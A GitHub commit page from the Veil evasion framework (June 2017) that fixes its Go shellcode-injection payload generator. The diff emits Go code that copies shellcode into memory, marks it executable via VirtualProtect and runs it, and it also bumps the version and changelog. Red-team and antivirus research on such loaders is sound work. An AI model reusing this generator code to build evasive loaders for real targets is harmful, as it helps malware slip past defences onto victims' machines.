Fixed golang payload issue

MJGrey · Jun 7, 2017 · 5caee9a · 5caee9a
1 parent 38e6e4e
commit 5caee9a
Show file tree

Hide file tree

Showing 3 changed files with 12 additions and 4 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,3 +1,7 @@
+[06.06.2017]
+     Released.: 3.1.2
+     Modified.: Fixed golang payloads when using virtualprotect
+
 [05.27.2017]
      Released.: 3.1.1
      Modified.: Autoit payload now auto-parses and supports large shellcode input that is > 4000

diff --git a/Tools/Evasion/payloads/go/shellcode_inject/virtual.py b/Tools/Evasion/payloads/go/shellcode_inject/virtual.py
@@ -68,6 +68,7 @@ def generate(self):
         rand_var = evasion_helpers.randomString()
         procVirtualProtect = evasion_helpers.randomString()
         proc_out = evasion_helpers.randomString()
+        vprotectendvar = evasion_helpers.randomString()
 
         # Generate the shellcode
         if not self.cli_shellcode:
@@ -144,12 +145,15 @@ def generate(self):
         if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
             payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(buff, addr)
             payload_code += "var %s uintptr\n" %(proc_out)
-            payload_code += "%s, _, %s = %s.Call(%s, uintptr(len(%s)), 0x20, 0)\n" %(proc_out, err, procVirtualProtect, addr, shellcode_variable)
+            payload_code += "var %s uintptr\n" %(vprotectendvar)
+            payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" %(value, shellcode_variable)
+            payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
+            payload_code += "%s, _, %s = %s.Call(%s, uintptr(len(%s)), 0x20, uintptr(unsafe.Pointer(&%s)))\n" %(proc_out, err, procVirtualProtect, addr, shellcode_variable, vprotectendvar)
             payload_code += "if %s == 0 {\nos.Exit(1)\n}\n" %(proc_out)
         elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
             payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(buff, heapallocout)
-        payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" %(value, shellcode_variable)
-        payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
+            payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" %(value, shellcode_variable)
+            payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value)
         if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
             payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (addr)
         elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

diff --git a/lib/common/messages.py b/lib/common/messages.py
@@ -19,7 +19,7 @@
         sys.exit(1)
 
 # Current version of Veil
-veil_version = "3.1.1"
+veil_version = "3.1.2"
 
 
 def title_screen():